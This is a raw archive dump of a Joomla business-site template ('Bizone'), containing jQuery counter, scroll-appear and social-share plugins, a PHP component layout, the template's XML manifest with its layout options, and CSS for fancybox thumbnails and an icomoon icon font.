			// initialize the element with the starting value
			render(value);

			function updateTimer() {
				value += increment;
				loopCount++;

				render(value);

				if (typeof(settings.onUpdate) == 'function') {
					settings.onUpdate.call(self, value);
				}

				if (loopCount >= loops) {
					// remove the interval
					$self.removeData('countTo');
					clearInterval(data.interval);
					value = settings.to;

					if (typeof(settings.onComplete) == 'function') {
						settings.onComplete.call(self, value);
					}
				}
			}

			function render(value) {
				var formattedValue = settings.formatter.call(self, value, settings);
				$self.text(formattedValue);
			}
		});
	};

	$.fn.countTo.defaults = {
		from: 0,               // the number the element should start at
		to: 0,                 // the number the element should end at
		speed: 1000,           // how long it should take to count between the target numbers
		refreshInterval: 100,  // how often the element should be updated
		decimals: 0,           // the number of decimal places to show
		formatter: formatter,  // handler for formatting the value before rendering
		onUpdate: null,        // callback method for every time the element is updated
		onComplete: null       // callback method for when the element finishes updating
	};

	function formatter(value, settings) {
		return value.toFixed(settings.decimals);
	}
}(jQuery));PK!�Jqwwbizone/js/jqSocialSharer.min.jsnu&1i�;;(function ($){$["fn"]["jqSocialSharer"]=function (options){var settings=$["extend"]({"popUpWidth":550,"popUpHeight":450,"popUpTop":100,"useCurrentLocation":false},options);return this["each"](function (index,value){$(this)["bind"]("click",function (evt){evt["preventDefault"]();var social=$(this)["data"]("social"),width=settings["popUpWidth"],height=settings["popUpHeight"],sHeight=screen["height"],sWidth=screen["width"],left=Math["round"]((sWidth/2)-(width/2)),top=settings["popUpTop"],url,useCurrentLoc=settings["useCurrentLocation"],socialURL=(useCurrentLoc)?window["location"]:encodeURIComponent(social["url"]),socialText=social["text"],socialImage=encodeURIComponent(social["image"]);switch(social["type"]){case "facebook":url="https://www.facebook.com/sharer/sharer.php?s=100\x26p[url]="+socialURL+"\x26p[images][0]="+socialImage+"\x26p[title]="+socialText+"\x26p[summary]="+socialText;break ;;case "twitter":url="http://twitter.com/share?url="+socialURL+"\x26text="+socialText;break ;;case "plusone":url="https://plusone.google.com/_/+1/confirm?hl=en\x26url="+socialURL;break ;;case "pinterest":url="http://pinterest.com/pin/create/button/?url="+socialURL+"\x26media="+socialImage+"\x26description="+socialText;break ;;} ;window["open"](url,"","left="+left+" , top="+top+", width="+width+", height="+height+", personalbar=0, toolbar=0, scrollbars=1, resizable=1");} );} );} ;} (jQuery));
PK!��'�



bizone/js/jquery.appear.jsnu&1i� /*
 * jQuery.appear
 * https://github.com/bas2k/jquery.appear/
 * http://code.google.com/p/jquery-appear/
 *
 * Copyright (c) 2009 Michael Hixson
 * Copyright (c) 2012 Alexander Brovikov
 * Licensed under the MIT license (http://www.opensource.org/licenses/mit-license.php)
 */
(function($) {
	$.fn.appear = function(fn, options) {

		var settings = $.extend({

			//arbitrary data to pass to fn
			data: undefined,

			//call fn only on the first appear?
			one: true,

			// X & Y accuracy
			accX: 0,
			accY: 0

		}, options);

		return this.each(function() {

			var t = $(this);

			//whether the element is currently visible
			t.appeared = false;

			if (!fn) {

				//trigger the custom event
				t.trigger('appear', settings.data);
				return;
			}

			var w = $(window);

			//fires the appear event when appropriate
			var check = function() {

				//is the element hidden?
				if (!t.is(':visible')) {

					//it became hidden
					t.appeared = false;
					return;
				}

				//is the element inside the visible window?
				var a = w.scrollLeft();
				var b = w.scrollTop();
				var o = t.offset();
				var x = o.left;
				var y = o.top;

				var ax = settings.accX;
				var ay = settings.accY;
				var th = t.height();
				var wh = w.height();
				var tw = t.width();
				var ww = w.width();

				if (y + th + ay >= b &&
					y <= b + wh + ay &&
					x + tw + ax >= a &&
					x <= a + ww + ax) {

					//trigger the custom event
					if (!t.appeared) t.trigger('appear', settings.data);

				} else {

					//it scrolled out of view
					t.appeared = false;
				}
			};

			//create a modified fn with some additional logic
			var modifiedFn = function() {

				//mark the element as visible
				t.appeared = true;

				//is this supposed to happen only once?
				if (settings.one) {

					//remove the check
					w.unbind('scroll', check);
					var i = $.inArray(check, $.fn.appear.checks);
					if (i >= 0) $.fn.appear.checks.splice(i, 1);
				}

				//trigger the original fn
				fn.apply(this, arguments);
			};

			//bind the modified fn to the element
			if (settings.one) t.one('appear', settings.data, modifiedFn);
			else t.bind('appear', settings.data, modifiedFn);

			//check whenever the window scrolls
			w.scroll(check);

			//check whenever the dom changes
			$.fn.appear.checks.push(check);

			//check now
			(check)();
		});
	};

	//keep a queue of appearance checks
	$.extend($.fn.appear, {

		checks: [],
		timeout: null,

		//process the queue
		checkAll: function() {
			var length = $.fn.appear.checks.length;
			if (length > 0) while (length--) ($.fn.appear.checks[length])();
		},

		//check the queue asynchronously
		run: function() {
			if ($.fn.appear.timeout) clearTimeout($.fn.appear.timeout);
			$.fn.appear.timeout = setTimeout($.fn.appear.checkAll, 20);
		}
	});

	//run checks when these methods are called
	$.each(['append', 'prepend', 'after', 'before', 'attr',
		'removeAttr', 'addClass', 'removeClass', 'toggleClass',
		'remove', 'css', 'show', 'hide'], function(i, n) {
		var old = $.fn[n];
		if (old) {
			$.fn[n] = function() {
				var r = old.apply(this, arguments);
				$.fn.appear.run();
				return r;
			}
		}
	});

})(jQuery);PK!�	���bizone/component.phpnu&1i�<?php
/**
 * @package     Joomla.Site
 * @subpackage  Templates.protostar
 *
 * @copyright   Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.
 * @license     GNU General Public License version 2 or later; see LICENSE.txt
 */

defined('_JEXEC') or die;

$app             = JFactory::getApplication();
$doc             = JFactory::getDocument();
$this->language  = $doc->language;
$this->direction = $doc->direction;

// Add JavaScript Frameworks
JHtml::_('bootstrap.framework');

// Add Stylesheets
$doc->addStyleSheet('templates/' . $this->template . '/css/template.css');

// Load optional rtl Bootstrap css and Bootstrap bugfixes
JHtmlBootstrap::loadCss($includeMaincss = false, $this->direction);

?>
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="<?php echo $this->language; ?>" lang="<?php echo $this->language; ?>" dir="<?php echo $this->direction; ?>">
<head>
<jdoc:include type="head" />
<!--[if lt IE 9]>
	<script src="<?php echo $this->baseurl; ?>/media/jui/js/html5.js"></script>
<![endif]-->
</head>
<body class="contentpane modal">
	<jdoc:include type="message" />
	<jdoc:include type="component" />
</body>
</html>
PK!E�x���bizone/templateDetails.xmlnu&1i�<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE install PUBLIC "-//Joomla! 2.5//DTD template 1.0//EN" "http://www.joomla.org/xml/dtd/2.5/template-install.dtd">
<extension version="3.1" type="template" client="site">
	<name>Bizone</name>
	<version>1.0</version>
	<creationDate>08/10/2015</creationDate>
	<author>CMS BlueTheme</author>
	<authorEmail>contact.bluetheme@gmail.com</authorEmail>
	<copyright>Copyright (C) 2005 - 2014 Open Source Matters, Inc. All rights reserved.</copyright>
	<description>TPL_BIZONE_XML_DESCRIPTION</description>
	<files>
		<filename>component.php</filename>
		<filename>error.php</filename>
		<filename>index.php</filename>
		<filename>templateDetails.xml</filename>
		<filename>template_preview.png</filename>
		<filename>template_thumbnail.png</filename>
		<folder>css</folder>
		<folder>html</folder>
		<folder>images</folder>
		<folder>fonts</folder>
		<folder>js</folder>
		<folder>language</folder>
	</files>
	<positions>
		<position>debug</position>
		<position>bizone-top</position>
		<position>bizone-topmenu</position>
		<position>bizone-navmenu</position>
		<position>bizone-breadcrumbs</position>
		<position>bizone-search</position>
		<position>bizone-right</position>
		<position>bizone-footer</position>
	</positions>
	<languages folder="language">
		<language tag="en-GB">en-GB/en-GB.tpl_bizone.ini</language>
		<language tag="en-GB">en-GB/en-GB.tpl_bizone.sys.ini</language>
	</languages>
	<config>
		<fields name="params">
			<fieldset name="advanced">
				<field name="logoFile" class="" type="media" default=""
					label="TPL_BIZONE_LOGO_LABEL"
					description="TPL_BIZONE_LOGO_DESC " />
				<field name="logoFile_2" class="" type="media" default=""
					label="Logo sticky, agency menu"
					description="TPL_BIZONE_LOGO_DESC " />
				<field name="favicon" class="" type="media" default=""
					label="TPL_BIZONE_FAVICO_LABEL"
					description="TPL_BIZONE_FAVICO_DESC " />
				<field name="bt_bgheader" class="" type="media" default=""
					label="Background Header"
					description="Choose background header in blog" />
				<field name="cssbefore"  type="textarea" default=""
					label="TPL_BIZONE_CSS_LABEL"
					description="TPL_BIZONE_CSS_DESC"
					row="10"
					cols="5" />
				<field name="jsbefore"  type="textarea" default=""
					label="TPL_BIZONE_JS_LABEL"
					description="TPL_BIZONE_JS_DESC"
					row="10"
					cols="5" />
				<field name="apple-touch" class="" type="media" default=""
					label="TPL_BIZONE_APPLE_TOUCH_LABEL"
					description="TPL_BIZONE_APPLE_TOUCH_DESC " />
				<field name="apple-touch-57" class="" type="media" default=""
					label="TPL_BIZONE_APPLE_TOUCH_57_LABEL"
					description="TPL_BIZONE_APPLE_TOUCH_57_DESC " />
				<field name="apple-touch-72" class="" type="media" default=""
					label="TPL_BIZONE_APPLE_TOUCH_72_LABEL"
					description="TPL_BIZONE_APPLE_72_TOUCH_DESC " />
				<field name="apple-touch-114" class="" type="media" default=""
					label="TPL_BIZONE_APPLE_TOUCH_114_LABEL"
					description="TPL_BIZONE_APPLE_TOUCH_114_DESC " />
				<field name="apple-touch-144" class="" type="media" default=""
					label="TPL_BIZONE_APPLE_TOUCH_144_LABEL"
					description="TPL_BIZONE_APPLE_TOUCH_144_DESC " />
			</fieldset>

			<fieldset name="layout">

                <field name="xml_404_page" type="menuitem"
					label="TPL_BIZONE_404_PAGE_LABEL"
					description="TPL_BIZONE_404_PAGE_DESC" />

				<field name="bt_layout" type="list" label="Layout" description="">
		        	<option value="0" >Default</option>
					<option value="index_2">Business Version</option>
		            <option value="index_3" >Attorney / Law Version</option>
		            <option value="index_4" >Studio / Agency Version</option>
		            <option value="index_5" >Finance Version</option>
		            <option value="index_6" >Corporate Version</option>
		            <option value="index_7" >Construction</option>
		            <option value="index_8" >Food / Restaurant</option>
		            <option value="index_9" >Video Slider</option>
		            <option value="index_10" >Parallax Version</option>
		            <option value="index_11" >Education</option>
		            <option value="index_12" >FullScreen</option>
		            <option value="index_13" >Side Menu</option>
		            <option value="index_14" >Agency - Side Menu</option>
				</field>

				<field name="maincolor" class="" type="color" default=""
					label="Custom Main Color"
					description=" " />

				<field name="googleFont"
					type="radio"
					class="btn-group btn-group-yesno"
					default="1"
					label="TPL_BIZONE_FONT_LABEL"
					description="TPL_BIZONE_FONT_DESC"
				>
					<option value="1">JYES</option>
					<option value="0">JNO</option>
				</field>

				<field name="googleFontName" class="" type="text" default="Open+Sans"
					showon="googleFont:1"
					label="TPL_BIZONE_FONT_NAME_LABEL"
					description="TPL_BIZONE_FONT_NAME_DESC" />
			</fieldset>

			<fieldset name="other">
				<field name="btloading"
					type="radio"
					class="btn-group btn-group-yesno"
					default="1"
					label="TPL_BIZONE_LOADING_LABEL"
					description=""
				>
					<option value="1">JYES</option>
					<option value="0">JNO</option>
				</field>
				<field name="stateggcaptcha" type="list" default="0" 
					label="TPL_BIZONE_STATE_CAPTCHA_LABEL" description="">
					  <option value="0">No</option>
					  <option value="1">Yes</option>
				</field>
				<field name="captchasitekey" type="password" default=""
					showon="stateggcaptcha:1"
					label="TPL_BIZONE_SITEKEY_LABEL" 
					description="" />
				<field name="captchasecret" type="password" default=""
					showon="stateggcaptcha:1"
					label="TPL_BIZONE_SECRET_LABEL" 
					description="" />
			</fieldset>	
		</fields>
	</config>
</extension>PK!����%bizone/css/jquery.fancybox-thumbs.cssnu&1i�#fancybox-thumbs {
	position: fixed;
	left: 0;
	width: 100%;
	overflow: hidden;
	z-index: 8050;
}

#fancybox-thumbs.bottom {
	bottom: 2px;
}

#fancybox-thumbs.top {
	top: 2px;
}

#fancybox-thumbs ul {
	position: relative;
	list-style: none;
	margin: 0;
	padding: 0;
}

#fancybox-thumbs ul li {
	float: left;
	padding: 1px;
	opacity: 0.5;
}

#fancybox-thumbs ul li.active {
	opacity: 0.75;
	padding: 0;
	border: 1px solid #fff;
}

#fancybox-thumbs ul li:hover {
	opacity: 1;
}

#fancybox-thumbs ul li a {
	display: block;
	position: relative;
	overflow: hidden;
	border: 1px solid #222;
	background: #111;
	outline: none;
}

#fancybox-thumbs ul li img {
	display: block;
	position: relative;
	border: 0;
	padding: 0;
	max-width: none;
}PK!���iibizone/css/icomoon-fonts.cssnu&1i�@font-face {
    font-family: 'icomoon';
    src:    url('../fonts/icomoon.eot?atrcei');
    src:    url('../fonts/icomoon.eot?atrcei#iefix') format('embedded-opentype'),
        url('../fonts/icomoon.ttf?atrcei') format('truetype'),
        url('../fonts/icomoon.woff?atrcei') format('woff'),
        url('../fonts/icomoon.svg?atrcei#icomoon') format('svg');
    font-weight: normal;
    font-style: normal;
}

[class^="icon-"], [class*=" icon-"] {
    /* use !important to prevent issues with browser extensions that change fonts */
    font-family: 'icomoon' !important;
    speak: none;
    font-style: normal;
    font-weight: normal;
    font-variant: normal;
    text-transform: none;
    line-height: 1;

    /* Better Font Rendering =========== */
    -webkit-font-smoothing: antialiased;
    -moz-osx-font-smoothing: grayscale;
}

.icon-icons9:before {
    content: "\e900";
}
.icon-icons20:before {
    content: "\e901";
}
.icon-icons37:before {
    content: "\e902";
}
.icon-icons39:before {
    content: "\e903";
}
.icon-icons42:before {
    content: "\e904";
}
.icon-icons96:before {
    content: "\e905";
}
.icon-icons112:before {
    content: "\e906";
}
.icon-icons158:before {
    content: "\e907";
}
.icon-icons163:before {
    content: "\e908";
}
.icon-icons171:before {
    content: "\e909";
}
.icon-icons180:before {
    content: "\e90a";
}
.icon-icons185:before {
    content: "\e90b";
}
.icon-icons202:before {
    content: "\e90c";
}
.icon-icons206:before {
    content: "\e90d";
}
.icon-icons208:before {
    content: "\e90e";
}
.icon-icons236:before {
    content: "\e90f";
}
.icon-mobile3:before {
    content: "\e000";
}
.icon-laptop2:before {
    content: "\e001";
}
.icon-desktop:before {
    content: "\e002";
}
.icon-tablet2:before {
    content: "\e003";
}
.icon-phone2:before {
    content: "\e004";
}
.icon-document:before {
    content: "\e005";
}
.icon-documents:before {
    content: "\e006";
}
.icon-search2:before {
    content: "\e007";
}
.icon-clipboard2:before {
    content: "\e008";
}
.icon-newspaper2:before {
    content: "\e009";
}
.icon-notebook:before {
    content: "\e00a";
}
.icon-book-open:before {
    content: "\e00b";
}
.icon-browser:before {
    content: "\e00c";
}
.icon-calendar2:before {
    content: "\e00d";
}
.icon-presentation:before {
    content: "\e00e";
}
.icon-picture:before {
    content: "\e00f";
}
.icon-pictures:before {
    content: "\e010";
}
.icon-video:before {
    content: "\e011";
}
.icon-camera2:before {
    content: "\e012";
}
.icon-printer2:before {
    content: "\e013";
}
.icon-toolbox:before {
    content: "\e014";
}
.icon-briefcase2:before {
    content: "\e015";
}
.icon-wallet:before {
    content: "\e016";
}
.icon-gift2:before {
    content: "\e017";
}
.icon-bargraph:before {
    content: "\e018";
}
.icon-grid:before {
    content: "\e019";
}
.icon-expand:before {
    content: "\e01a";
}
.icon-focus:before {
    content: "\e01b";
}
.icon-edit:before {
    content: "\e01c";
}
.icon-adjustments:before {
    content: "\e01d";
}
.icon-ribbon:before {
    content: "\e01e";
}
.icon-hourglass:before {
    content: "\e01f";
}
.icon-lock2:before {
    content: "\e020";
}
.icon-megaphone:before {
    content: "\e021";
}
.icon-shield2:before {
    content: "\e022";
}
.icon-trophy2:before {
    content: "\e023";
}
.icon-flag2:before {
    content: "\e024";
}
.icon-map3:before {
    content: "\e025";
}
.icon-puzzle:before {
    content: "\e026";
}
.icon-basket:before {
    content: "\e027";
}
.icon-envelope:before {
    content: "\e028";
}
.icon-streetsign:before {
    content: "\e029";
}
.icon-telescope:before {
    content: "\e02a";
}
.icon-gears:before {
    content: "\e02b";
}
.icon-key3:before {
    content: "\e02c";
}
.icon-paperclip:before {
    content: "\e02d";
}
.icon-attachment2:before {
    content: "\e02e";
}
.icon-pricetags:before {
    content: "\e02f";
}
.icon-lightbulb:before {
    content: "\e030";
}
.icon-layers:before {
    content: "\e031";
}
.icon-pencil3:before {
    content: "\e032";
}
.icon-tools:before {
    content: "\e033";
}
.icon-tools-2:before {
    content: "\e034";
}
.icon-scissors2:before {
    content: "\e035";
}
.icon-paintbrush:before {
    content: "\e036";
}
.icon-magnifying-glass:before {
    content: "\e037";
}
.icon-circle-compass:before {
    content: "\e038";
}
.icon-linegraph:before {
    content: "\e039";
}
.icon-mic2:before {
    content: "\e03a";
}
.icon-strategy:before {
    content: "\e03b";
}
.icon-beaker:before {
    content: "\e03c";
}
.icon-caution:before {
    content: "\e03d";
}
.icon-recycle:before {
    content: "\e03e";
}
.icon-anchor:before {
    content: "\e03f";
}
.icon-profile-male:before {
    content: "\e040";
}
.icon-profile-female:before {
    content: "\e041";
}
.icon-bike:before {
    content: "\e042";
}
.icon-wine:before {
    content: "\e043";
}
.icon-hotairballoon:before {
    content: "\e044";
}
.icon-globe:before {
    content: "\e045";
}
.icon-genius:before {
    content: "\e046";
}
.icon-map-pin:before {
    content: "\e047";
}
.icon-dial:before {
    content: "\e048";
}
.icon-chat:before {
    content: "\e049";
}
.icon-heart2:before {
    content: "\e04a";
}
.icon-cloud2:before {
    content: "\e04b";
}
.icon-upload4:before {
    content: "\e04c";
}
.icon-download4:before {
    content: "\e04d";
}
.icon-target2:before {
    content: "\e04e";
}
.icon-hazardous:before {
    content: "\e04f";
}
.icon-piechart:before {
    content: "\e050";
}
.icon-speedometer:before {
    content: "\e051";
}
.icon-global:before {
    content: "\e052";
}
.icon-compass3:before {
    content: "\e053";
}
.icon-lifesaver:before {
    content: "\e054";
}
.icon-clock3:before {
    content: "\e055";
}
.icon-aperture:before {
    content: "\e056";
}
.icon-quote:before {
    content: "\e057";
}
.icon-scope:before {
    content: "\e058";
}
.icon-alarmclock:before {
    content: "\e059";
}
.icon-refresh:before {
    content: "\e05a";
}
.icon-happy3:before {
    content: "\e05b";
}
.icon-sad3:before {
    content: "\e05c";
}
.icon-facebook3:before {
    content: "\e05d";
}
.icon-twitter2:before {
    content: "\e05e";
}
.icon-googleplus:before {
    content: "\e05f";
}
.icon-rss3:before {
    content: "\e060";
}
.icon-tumblr3:before {
    content: "\e061";
}
.icon-linkedin3:before {
    content: "\e062";
}
.icon-dribbble2:before {
    content: "\e063";
}
.icon-heart3:before {
    content: "\e910";
}
.icon-cloud3:before {
    content: "\e911";
}
.icon-star:before {
    content: "\e912";
}
.icon-tv2:before {
    content: "\e913";
}
.icon-sound:before {
    content: "\e914";
}
.icon-video2:before {
    content: "\e915";
}
.icon-trash:before {
    content: "\e916";
}
.icon-user2:before {
    content: "\e917";
}
.icon-key4:before {
    content: "\e918";
}
.icon-search3:before {
    content: "\e919";
}
.icon-settings:before {
    content: "\e91a";
}
.icon-camera3:before {
    content: "\e91b";
}
.icon-tag:before {
    content: "\e91c";
}
.icon-lock3:before {
    content: "\e91d";
}
.icon-bulb:before {
    content: "\e91e";
}
.icon-pen2:before {
    content: "\e91f";
}
.icon-diamond:before {
    content: "\e920";
}
.icon-display2:before {
    content: "\e921";
}
.icon-location3:before {
    content: "\e922";
}
.icon-eye2:before {
    content: "\e923";
}
.icon-bubble3:before {
    content: "\e924";
}
.icon-stack2:before {
    content: "\e925";
}
.icon-cup:before {
    content: "\e926";
}
.icon-phone3:before {
    content: "\e927";
}
.icon-news:before {
    content: "\e928";
}
.icon-mail5:before {
    content: "\e929";
}
.icon-like:before {
    content: "\e92a";
}
.icon-photo:before {
    content: "\e92b";
}
.icon-note:before {
    content: "\e92c";
}
.icon-clock4:before {
    content: "\e92d";
}
.icon-paperplane:before {
    content: "\e92e";
}
.icon-params:before {
    content: "\e92f";
}
.icon-banknote:before {
    content: "\e930";
}
.icon-data:before {
    content: "\e931";
}
.icon-music2:before {
    content: "\e932";
}
.icon-megaphone2:before {
    content: "\e933";
}
.icon-study:before {
    content: "\e934";
}
.icon-lab2:before {
    content: "\e935";
}
.icon-food:before {
    content: "\e936";
}
.icon-t-shirt:before {
    content: "\e937";
}
.icon-fire2:before {
    content: "\e938";
}
.icon-clip:before {
    content: "\e939";
}
.icon-shop:before {
    content: "\e93a";
}
.icon-calendar3:before {
    content: "\e93b";
}
.icon-wallet2:before {
    content: "\e93c";
}
.icon-vynil:before {
    content: "\e93d";
}
.icon-truck2:before {
    content: "\e93e";
}
.icon-world:before {
    content: "\e93f";
}
.icon-mail-envelope:before {
    content: "\e940";
}
.icon-mail-envelope2:before {
    content: "\e941";
}
.icon-mail-envelope-open:before {
    content: "\e942";
}
.icon-mail-envelope-open2:before {
    content: "\e943";
}
.icon-mail-envelope-closed:before {
    content: "\e944";
}
.icon-mail-envelope-closed2:before {
    content: "\e945";
}
.icon-mail-envelope-open3:before {
    content: "\e946";
}
.icon-mail-envelope-open4:before {
    content: "\e947";
}
.icon-mail-envelope-open5:before {
    content: "\e948";
}
.icon-mail-envelope-open6:before {
    content: "\e949";
}
.icon-mail-envelope-closed3:before {
    content: "\e94a";
}
.icon-mail-envelope-closed4:before {
    content: "\e94b";
}
.icon-mail-envelope-open7:before {
    content: "\e94c";
}
.icon-mail-envelope-open8:before {
    content: "\e94d";
}
.icon-mail-error:before {
    content: "\e94e";
}
.icon-mail-error2:before {
    content: "\e94f";
}
.icon-mail-checked:before {
    content: "\e950";
}
.icon-mail-checked2:before {
    content: "\e951";
}
.icon-mail-cancel:before {
    content: "\e952";
}
.icon-mail-cancel2:before {
    content: "\e953";
}
.icon-mail--forbidden:before {
    content: "\e954";
}
.icon-mail--forbidden2:before {
    content: "\e955";
}
.icon-mail-add:before {
    content: "\e956";
}
.icon-mail-add2:before {
    content: "\e957";
}
.icon-mail-remove:before {
    content: "\e958";
}
.icon-mail-remove2:before {
    content: "\e959";
}
.icon-flag3:before {
    content: "\e95a";
}
.icon-flag4:before {
    content: "\e95b";
}
.icon-flag5:before {
    content: "\e95c";
}
.icon-flag6:before {
    content: "\e95d";
}
.icon-flag7:before {
    content: "\e95e";
}
.icon-flag8:before {
    content: "\e95f";
}
.icon-flag9:before {
    content: "\e960";
}
.icon-flag10:before {
    content: "\e961";
}
.icon-bookmark2:before {
    content: "\e962";
}
.icon-bookmark3:before {
    content: "\e963";
}
.icon-bookmark-add:before {
    content: "\e964";
}
.icon-bookmark-add2:before {
    content: "\e965";
}
.icon-bookmark-remove:before {
    content: "\e966";
}
.icon-bookmark-remove2:before {
    content: "\e967";
}
.icon-eye-hidden:before {
    content: "\e968";
}
.icon-eye-hidden2:before {
    content: "\e969";
}
.icon-eye3:before {
    content: "\e96a";
}
.icon-eye4:before {
    content: "\e96b";
}
.icon-star2:before {
    content: "\e96c";
}
.icon-star3:before {
    content: "\e96d";
}
.icon-key5:before {
    content: "\e96e";
}
.icon-key6:before {
    content: "\e96f";
}
.icon-key7:before {
    content: "\e970";
}
.icon-key8:before {
    content: "\e971";
}
.icon-trash-can:before {
    content: "\e972";
}
.icon-trash-can2:before {
    content: "\e973";
}
.icon-trash-can3:before {
    content: "\e974";
}
.icon-trash-can4:before {
    content: "\e975";
}
.icon-information:before {
    content: "\e976";
}
.icon-information2:before {
    content: "\e977";
}
.icon-information3:before {
    content: "\e978";
}
.icon-information4:before {
    content: "\e979";
}
.icon-book2:before {
    content: "\e97a";
}
.icon-book3:before {
    content: "\e97b";
}
.icon-book-bookmark:before {
    content: "\e97c";
}
.icon-book-bookmark2:before {
    content: "\e97d";
}
.icon-clipboard-edit:before {
    content: "\e97e";
}
.icon-clipboard-edit2:before {
    content: "\e97f";
}
.icon-clipboard-add:before {
    content: "\e980";
}
.icon-clipboard-add2:before {
    content: "\e981";
}
.icon-clipboard-remove:before {
    content: "\e982";
}
.icon-clipboard-remove2:before {
    content: "\e983";
}
.icon-clipboard3:before {
    content: "\e984";
}
.icon-clipboard4:before {
    content: "\e985";
}
.icon-clipboard-download:before {
    content: "\e986";
}
.icon-clipboard-download2:before {
    content: "\e987";
}
.icon-clipboard-upload:before {
    content: "\e988";
}
.icon-clipboard-upload2:before {
    content: "\e989";
}
.icon-clipboard-checked:before {
    content: "\e98a";
}
.icon-clipboard-checked2:before {
    content: "\e98b";
}
.icon-clipboard-text:before {
    content: "\e98c";
}
.icon-clipboard-text2:before {
    content: "\e98d";
}
.icon-clipboard-list:before {
    content: "\e98e";
}
.icon-clipboard-list2:before {
    content: "\e98f";
}
.icon-note2:before {
    content: "\e990";
}
.icon-note3:before {
    content: "\e991";
}
.icon-note-add:before {
    content: "\e992";
}
.icon-note-add2:before {
    content: "\e993";
}
.icon-note-remove:before {
    content: "\e994";
}
.icon-note-remove2:before {
    content: "\e995";
}
.icon-note-text:before {
    content: "\e996";
}
.icon-note-text2:before {
    content: "\e997";
}
.icon-note-list:before {
    content: "\e998";
}
.icon-note-list2:before {
    content: "\e999";
}
.icon-note-checked:before {
    content: "\e99a";
}
.icon-note-checked2:before {
    content: "\e99b";
}
.icon-note-important:before {
    content: "\e99c";
}
.icon-note-important2:before {
    content: "\e99d";
}
.icon-notebook2:before {
    content: "\e99e";
}
.icon-notebook3:before {
    content: "\e99f";
}
.icon-notebook4:before {
    content: "\e9a0";
}
.icon-notebook5:before {
    content: "\e9a1";
}
.icon-notebook6:before {
    content: "\e9a2";
}
.icon-notebook7:before {
    content: "\e9a3";
}
.icon-notebook8:before {
    content: "\e9a4";
}
.icon-notebook9:before {
    content: "\e9a5";
}
.icon-notebook-text:before {
    content: "\e9a6";
}
.icon-notebook-text2:before {
    content: "\e9a7";
}
.icon-notebook-list:before {
    content: "\e9a8";
}
.icon-notebook-list2:before {
    content: "\e9a9";
}
.icon-document2:before {
    content: "\e9aa";
}
.icon-document3:before {
    content: "\e9ab";
}
.icon-document-text:before {
    content: "\e9ac";
}
.icon-document-text2:before {
    content: "\e9ad";
}
.icon-document-text3:before {
    content: "\e9ae";
}
.icon-document-text4:before {
    content: "\e9af";
}
.icon-document-download:before {
    content: "\e9b0";
}
.icon-document-download2:before {
    content: "\e9b1";
}
.icon-document-upload:before {
    content: "\e9b2";
}
.icon-document-upload2:before {
    content: "\e9b3";
}
.icon-document-bookmark:before {
    content: "\e9b4";
}
.icon-document-bookmark2:before {
    content: "\e9b5";
}
.icon-document-diagrams:before {
    content: "\e9b6";
}
.icon-document-diagrams2:before {
    content: "\e9b7";
}
.icon-document-recording:before {
    content: "\e9b8";
}
.icon-document-recording2:before {
    content: "\e9b9";
}
.icon-document-table:before {
    content: "\e9ba";
}
.icon-document-table2:before {
    content: "\e9bb";
}
.icon-document-music:before {
    content: "\e9bc";
}
.icon-document-music2:before {
    content: "\e9bd";
}
.icon-document-movie:before {
    content: "\e9be";
}
.icon-document-movie2:before {
    content: "\e9bf";
}
.icon-document-play:before {
    content: "\e9c0";
}
.icon-document-play2:before {
    content: "\e9c1";
}
.icon-document-graph:before {
    content: "\e9c2";
}
.icon-document-graph2:before {
    content: "\e9c3";
}
.icon-document-time:before {
    content: "\e9c4";
}
.icon-document-time2:before {
    content: "\e9c5";
}
.icon-document-text5:before {
    content: "\e9c6";
}
.icon-document-text6:before {
    content: "\e9c7";
}
.icon-document-code:before {
    content: "\e9c8";
}
.icon-document-code2:before {
    content: "\e9c9";
}
.icon-document-cloud:before {
    content: "\e9ca";
}
.icon-document-cloud2:before {
    content: "\e9cb";
}
.icon-documents2:before {
    content: "\e9cc";
}
.icon-documents3:before {
    content: "\e9cd";
}
.icon-documents4:before {
    content: "\e9ce";
}
.icon-documents5:before {
    content: "\e9cf";
}
.icon-document-search:before {
    content: "\e9d0";
}
.icon-document-search2:before {
    content: "\e9d1";
}
.icon-document-star:before {
    content: "\e9d2";
}
.icon-document-star2:before {
    content: "\e9d3";
}
.icon-document-unlocked:before {
    content: "\e9d4";
}
.icon-document-unlocked2:before {
    content: "\e9d5";
}
.icon-document-locked:before {
    content: "\e9d6";
}
.icon-document-locked2:before {
    content: "\e9d7";
}
.icon-document-error:before {
    content: "\e9d8";
}
.icon-document-error2:before {
    content: "\e9d9";
}
.icon-document-cancel:before {
    content: "\e9da";
}
.icon-document-cancel2:before {
    content: "\e9db";
}
.icon-document-checked:before {
    content: "\e9dc";
}
.icon-document-checked2:before {
    content: "\e9dd";
}
.icon-document-add:before {
    content: "\e9de";
}
.icon-document-add2:before {
    content: "\e9df";
}
.icon-document-remove:before {
    content: "\e9e0";
}
.icon-document-remove2:before {
    content: "\e9e1";
}
.icon-document-forbidden:before {
    content: "\e9e2";
}
.icon-document-forbidden2:before {
    content: "\e9e3";
}
.icon-document-information:before {
    content: "\e9e4";
}
.icon-document-information2:before {
    content: "\e9e5";
}
.icon-folder-information:before {
    content: "\e9e6";
}
.icon-folder-information2:before {
    content: "\e9e7";
}
.icon-document-list:before {
    content: "\e9e8";
}
.icon-document-list2:before {
    content: "\e9e9";
}
.icon-document-font:before {
    content: "\e9ea";
}
.icon-document-font2:before {
    content: "\e9eb";
}
.icon-inbox:before {
    content: "\e9ec";
}
.icon-inbox2:before {
    content: "\e9ed";
}
.icon-inboxes:before {
    content: "\e9ee";
}
.icon-inboxes2:before {
    content: "\e9ef";
}
.icon-inbox-document:before {
    content: "\e9f0";
}
.icon-inbox-document2:before {
    content: "\e9f1";
}
.icon-inbox-document-text:before {
    content: "\e9f2";
}
.icon-inbox-document-text2:before {
    content: "\e9f3";
}
.icon-inbox-download:before {
    content: "\e9f4";
}
.icon-inbox-download2:before {
    content: "\e9f5";
}
.icon-inbox-upload:before {
    content: "\e9f6";
}
.icon-inbox-upload2:before {
    content: "\e9f7";
}
.icon-folder2:before {
    content: "\e9f8";
}
.icon-folder3:before {
    content: "\e9f9";
}
.icon-folder4:before {
    content: "\e9fa";
}
.icon-folder5:before {
    content: "\e9fb";
}
.icon-folders:before {
    content: "\e9fc";
}
.icon-folders2:before {
    content: "\e9fd";
}
.icon-folder-download2:before {
    content: "\e9fe";
}
.icon-folder-download3:before {
    content: "\e9ff";
}
